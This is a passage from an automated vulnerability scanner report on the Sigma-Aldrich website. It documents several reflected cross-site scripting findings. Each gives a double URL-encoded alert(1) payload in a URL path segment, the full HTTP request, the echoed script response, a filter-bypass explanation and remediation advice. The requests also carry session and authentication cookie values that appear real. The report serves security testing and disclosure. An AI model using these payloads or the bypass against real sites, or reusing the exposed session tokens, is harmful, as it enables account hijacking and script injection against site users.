Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:40 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/Bulletin/2ba81";alert(1)//ecdfc01212/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.297. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69cd6%2522%253balert%25281%2529%252f%252faf8a76e8aff was submitted in the REST URL parameter 1. This input was echoed as 69cd6";alert(1)//af8a76e8aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc69cd6%2522%253balert%25281%2529%252f%252faf8a76e8aff/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:55 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc69cd6";alert(1)//af8a76e8aff/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.298. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5867%2522%253balert%25281%2529%252f%252f9ad24bd13ca was submitted in the REST URL parameter 2. This input was echoed as d5867";alert(1)//9ad24bd13ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibd5867%2522%253balert%25281%2529%252f%252f9ad24bd13ca/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:01 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibd5867";alert(1)//9ad24bd13ca/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.299. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9cd3%2522%253balert%25281%2529%252f%252fcbb5d0d0ac was submitted in the REST URL parameter 3. This input was echoed as a9cd3";alert(1)//cbb5d0d0ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docsa9cd3%2522%253balert%25281%2529%252f%252fcbb5d0d0ac/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:06 GMT
Content-Length: 28998
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docsa9cd3";alert(1)//cbb5d0d0ac/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.300. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7791%2522%253balert%25281%2529%252f%252f647a95d10b7 was submitted in the REST URL parameter 4. This input was echoed as a7791";alert(1)//647a95d10b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigmaa7791%2522%253balert%25281%2529%252f%252f647a95d10b7/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:11 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigmaa7791";alert(1)//647a95d10b7/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.301. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94f63%2522%253balert%25281%2529%252f%252faa7b8fef9ea was submitted in the REST URL parameter 5. This input was echoed as 94f63";alert(1)//aa7b8fef9ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information94f63%2522%253balert%25281%2529%252f%252faa7b8fef9ea/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
